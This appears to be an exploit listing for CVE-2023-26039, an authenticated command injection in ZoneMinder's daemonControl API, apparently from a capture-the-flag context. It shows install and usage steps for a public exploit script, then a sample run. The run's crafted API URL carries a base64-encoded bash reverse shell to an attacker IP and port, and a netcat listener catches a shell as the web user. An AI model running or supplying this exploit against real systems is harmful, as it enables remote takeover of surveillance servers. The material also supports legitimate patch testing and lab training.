Share
## https://sploitus.com/exploit?id=CACEC98B-636A-54A0-9F6C-641A2EE35D4E
# CVE-2023-26039

## Description

ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to `1.36.33` and `1.37.33` contain an OS Command Injection via `daemonControl()` in `/web/api/app/Controller/HostController.php`. Any authenticated user can construct an api command to execute any shell command as the web user. This issue is patched in versions `1.36.33` and `1.37.33`.


## Install

```bash
git clone https://github.com/ungabunga-ctf/CVE-2023-26039
cd CVE-2023-26039
python3 -m venv venv
source venv/bin/activate
pip install requests
python3 CVE-2023-26039.py
```

## Run

```bash
python3 CVE-2023-26039.py
usage: CVE-2023-26039.py [-h] -t TARGET -u USERNAME -p PASSWORD [-c CMD] [-lh LHOST] [-lp LPORT]
CVE-2023-26039.py: error: the following arguments are required: -t/--target, -u/--username, -p/--password
```

## Example

Run this in first terminal

```bash
python3 CVE-2023-26039.py -t http://localhost:8080 -u admin -p starcraft122490 -lh 10.10.15.8 -lp 4444
[+] Got token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJab25lTWluZGVyIiwiaWF0IjoxNzg0MzI4MzU3LCJleHAiOjE3ODQzMzU1NTcsInVzZXIiOiJhZG1pbiIsInR5cGUiOiJhY2Nlc3MifQ.BxB6EGkAyc_eaTg4JMYsbLqgmTCu-vh40l8HOoTNHcM...
http://localhost:8080/api/host/daemonControl/zmdc.pl.pl/%24%28echo%20%22YmFzaCAtYyAnYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNS44LzQ0NDQgMD4mMSc%3D%22%7Cbase64%20-d%7Cbash%29.json
```
and this is second

```bash
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.8] from (UNKNOWN) [10.129.230.42] 59380
bash: cannot set terminal process group (1080): Inappropriate ioctl for device
bash: no job control in this shell
zoneminder@surveillance:/usr/share/zoneminder/www/api/app/webroot$
```